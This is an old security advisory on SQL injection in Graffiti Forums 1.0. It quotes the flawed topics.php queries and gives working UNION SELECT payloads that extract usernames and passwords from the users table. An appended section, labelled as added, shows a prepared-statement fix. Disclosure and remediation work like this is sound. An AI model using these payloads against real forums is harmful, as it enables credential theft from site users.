/*
--------------------------------------------------------
[N]eo [S]ecurity [T]eam [NST] - Advisory #24 - 08/07/06
--------------------------------------------------------
Program: Graffiti Forums
Homepage: http://www.bluedojo.com/
Vulnerable Versions: 1.0.
Risk: High!
Impact: Critical Risk

-==Graffiti Forums v1.0 SQL Injection Vulnerabilities==-
---------------------------------------------------------

- Description
---------------------------------------------------------
This forum uses PHP, MySQL, and Java and is very easy to install. It lets people draw pictures to a graffiti "wall" instead
of posting text messages as in traditional forums.

- Tested
---------------------------------------------------------
localhost

- Exploitation
---------------------------------------------------------

1)

Vulnerable code:

==[ topics.php 8-11 ]==========================
[...]
$sql = "SELECT forum FROM graffiti_forums WHERE id=$f";
$result = mysql_query($sql);
$sql_row = mysql_fetch_row($result);
$forum_title = $sql_row[0];
[...]
==[ end topics.php ]==========================

As we can see, there is no protection against the use of single quotes in the SQL query. We also have to say that the script
doesn't work with register_globals off.

In this way, we can put in the $f variable something like this:
2 UNION SELECT password as forum FROM graffiti_users

So the SQL query looks like this:

SELECT forum FROM graffiti_forums WHERE id=2 UNION SELECT password as forum FROM graffiti_users

Here, 2 is a valid forum id. Using some ORDER BY clauses you can get different things... check it out.


2)
==[ topics.php 21-32 ]==========================
[...]
if (!$option){
    $sql = "SELECT id, topic FROM graffiti_topics WHERE id_forum=" . $f;
    if ($result = mysql_query($sql)){
        echo("");
        while ($sql_row = mysql_fetch_row($result)){
            echo("");
            echo("");
            $id = $sql_row[0];
            $topic = $sql_row[1];
            echo("");
            echo(" $topic");
            echo("");
[...]
==[ end topics.php ]==========================

In the SQL query of this code we can see the same bug. The exploitation is very similar to the other one:

topics.php?f=2 UNION SELECT password as topic, username as id FROM graffiti_users

The final SQL query looks like this:

SELECT id, topic FROM graffiti_topics WHERE id_forum=2 UNION SELECT password as topic, username as id FROM graffiti_users

Here, 2 is a valid forum id. Once again you can play with some ORDER BY or GROUP BY clauses.


Practically all the SQL queries of this script are vulnerable to SQL injection, so I'm not going to keep searching for bugs in a
cave of bugs.

Attention: the magic_quotes_gpc PHP flag has to be off (no filtering for slashes, single quotes and double quotes). Also
remember that the script doesn't work with register_globals off.


- How to fix it? More information?
--------------------------------------------------------
Visit our forum to know how to fix it or to get more information.
http://www.neosecurityteam.net/foro/

- References
--------------------------------------------------------
http://www.neosecurityteam.net/index.php?action=advisories&id=24

- Credits
--------------------------------------------------------
Discovered by Paisterist -> paisterist.nst [at] gmail [dot] com

[N]eo [S]ecurity [T]eam [NST] - http://www.neosecurityteam.net/


- Greets
--------------------------------------------------------
HaCkZaTaN
K4P0
Daemon21
Link
0m3gA_x
LINUX
m0rpheus

Argentina, Colombia, Chile, Bolivia, Uruguay EXISTS!!

@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@
'@@@@@''@@'@@@''''''''@@''@@@''@@
'@@'@@@@@@''@@@@@@ @@@'''''@@@
'@@'''@@@@'''''''''@@@''''@@@
@@@@''''@@'@@@@@@@@@@''''@@@@@

/* EOF */
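The following is an added example, not code from Graffiti Forums or from the advisory's authors: it takes the two queries shown above (topics.php 8-11 and 21-32) and rewrites them with an integer check plus mysqli prepared statements. Note that because $f is interpolated into the SQL string without surrounding quotes, magic_quotes_gpc would not help here anyway: the "2 UNION SELECT ..." payload contains no quote character to escape, so the fix has to be validation and parameter binding, not escaping. Table and column names (graffiti_forums, graffiti_topics, id, forum, topic, id_forum) come from the advisory; the function names, the connection placeholders and the HTML escaping on output are assumptions made for this example.

```php
<?php
// Added example (not Graffiti Forums code). Hardened versions of the two
// topics.php queries from the advisory. Table/column names are from the
// advisory; function names and connection details are assumptions.

// Read the forum id explicitly from $_GET instead of relying on
// register_globals, and accept only a plain positive decimal integer.
// This alone rejects "2 UNION SELECT ...": the space and letters fail
// the pattern, so the value can never reach the SQL text as anything
// but a number.
function forum_id_from_request() {
    $f = isset($_GET['f']) ? $_GET['f'] : '';
    if (!preg_match('/^[1-9][0-9]{0,9}$/', $f)) {
        return null;
    }
    return (int) $f;
}

// Query 1 (was: "SELECT forum FROM graffiti_forums WHERE id=$f").
// The id is bound as an integer parameter; it is sent to the server
// separately from the SQL string, so it cannot change the query's shape.
function forum_title_safe(mysqli $link, $f) {
    $stmt = $link->prepare('SELECT forum FROM graffiti_forums WHERE id = ?');
    $stmt->bind_param('i', $f);          // 'i' = integer parameter
    $stmt->execute();
    $title = null;
    $stmt->bind_result($title);
    if (!$stmt->fetch()) {
        $title = null;                   // no such forum
    }
    $stmt->close();
    return $title;
}

// Query 2 (was: "SELECT id, topic FROM graffiti_topics WHERE id_forum=" . $f).
// Same pattern; additionally escape the topic title on output so that a
// stored title cannot inject HTML into the page.
function topics_safe(mysqli $link, $f) {
    $stmt = $link->prepare('SELECT id, topic FROM graffiti_topics WHERE id_forum = ?');
    $stmt->bind_param('i', $f);
    $stmt->execute();
    $id = null;
    $topic = null;
    $stmt->bind_result($id, $topic);
    $topics = array();
    while ($stmt->fetch()) {
        $topics[] = array(
            'id'    => (int) $id,
            'topic' => htmlspecialchars($topic, ENT_QUOTES, 'UTF-8'),
        );
    }
    $stmt->close();
    return $topics;
}

// Usage: connection details below are placeholders, not real credentials.
$link = new mysqli('localhost', 'DB_USER_PLACEHOLDER', 'DB_PASSWORD_PLACEHOLDER', 'DB_NAME_PLACEHOLDER');
$f = forum_id_from_request();
if ($f === null) {
    http_response_code(400);
    exit('invalid forum id');
}
$forum_title = forum_title_safe($link, $f);
echo htmlspecialchars((string) $forum_title, ENT_QUOTES, 'UTF-8') . "\n";
foreach (topics_safe($link, $f) as $t) {
    echo $t['id'] . ' ' . $t['topic'] . "\n";
}
```

The integer check and the bound parameter are independent layers: either one on its own stops the UNION payload described in the advisory, and keeping both means a later change to one query (for example a column that genuinely has to accept a string) still leaves the other protection in place. Reading from $_GET directly also removes the dependency on register_globals that the advisory notes.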